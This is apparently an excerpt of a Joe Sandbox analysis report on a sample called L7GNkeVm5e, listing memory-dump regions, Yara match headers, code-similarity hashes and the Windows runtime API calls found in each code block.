                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2287132625-0
                                                                                                                                                                                                                                                  • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                  • Instruction ID: 1148a6f710608a224ad2a513332a81d658c07199864d374a294fd2a2e57f2774
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E517172A4420DAEDB22DFA5CC40ABEB7BAEF04708F054569E914E7150FB719B41CBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 0043B16C
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 0043B17A
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2444527052-0
                                                                                                                                                                                                                                                  • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                                                  • Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02130A13,?,?,?,?,0213046A,?,00000004), ref: 0213B343
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 0213B3D3
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 0213B3E1
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02130A13,00000000,02130B33), ref: 0213B484
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2444527052-0
                                                                                                                                                                                                                                                  • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                  • Instruction ID: c669f00a155aee469c3c71a60ab2258ec629f66d224e6756a9958601d9631abf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8761E971A84205AED726AF74CC41BAB739BEF04718F14443AE916D7180FB74DA00CB64
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2834031935-0
                                                                                                                                                                                                                                                  • Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                                                                                                                                                                  • Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                                                                                                                                                                  • Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0210DACD), ref: 0212A722
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0210DACD), ref: 0212A72C
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0210DACD), ref: 0212A739
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                  • Instruction ID: 25eca4c6d37eede6604f3aa2b2338e4564030a655d5d1e682d158201341b96c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9631D874D4122C9BCB21DF64DD8879CBBB8BF08710F5042EAE80CA7290E7749B958F48
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0042FE89
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                  • Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,0213008C,00000000,00457970,0000000C,021301E3,00000000,00000002,00000000), ref: 021300D7
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0213008C,00000000,00457970,0000000C,021301E3,00000000,00000002,00000000), ref: 021300DE
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 021300F0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                  • Instruction ID: 46d7942e644f02f464d1db77dca0f3f9e2f38e690f8b820e85f2d1f1f21e9d64
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5E0B635040648AFCF126F64DD08A597BABFB49B86F404064FA099B521CB36DE42CA84
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction ID: 8d3964254565dfb7a40da2e234806515813b4f54de45dc01fec139ea16ba0e7d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 573148B6900609DFDB10CF99C880BAEBBF9FF48324F15404AD845A7250D7B1EA45CBA4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                  • API String ID: 0-2043925204
                                                                                                                                                                                                                                                  • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                  • Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                  • API String ID: 0-2043925204
                                                                                                                                                                                                                                                  • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                  • Instruction ID: b8d655e70eeb330501067c5e118c119985ca0b9e8e61f661c5c8d206a063268c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0411572940218AFCB249FB9DC48EAB77BAEF80714F104269F915DB180E7719D85CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                  • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                                                  • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                                                  • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                                                  • Instruction ID: 9d78a679d83420df9935adb36ce5761b86d0da00fcd57b71cd5a430588871da8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4023D71E402299FDF14CFA9D8806ADB7F2FF48314F258269E919E7380D731A956CB84
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02102622
                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 021027C0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4264772764-0
                                                                                                                                                                                                                                                  • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                                  • Instruction ID: 0022d485b25b8a3154d87a3368ef0b702b23adb1b69aa6f224ac129889ce3af6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D410D25964384A9E731EFA5FC45B2533B0FF64722F10652BE528CB2B2E3B28544C75E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                  • Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02136F11,?,?,00000008,?,?,0213F3D2,00000000), ref: 02137143
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                  • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                  • Instruction ID: cffc319faa3c0f2dd6dfe7a5f2b0bc894f3464264b698f24eb57c6e9028cfd50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACB15E72150608DFD71ACF28C486B65BBE2FF45368F258658E899CF2E5C335E982CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2955987475-0
                                                                                                                                                                                                                                                  • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                                                                                                                                                                  • Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132190
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0213B8F0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2955987475-0
                                                                                                                                                                                                                                                  • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                  • Instruction ID: 12912561c9ea73806aeaa9abdda694249cd269c87e7e7d5242dd94c8d6dacdcb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B21657259420A9FDF269F25DC41BBA77AEEF44718F10017AEE01D6140FB799A44CB50
                                                                                                                                                                                                                                                  APIs
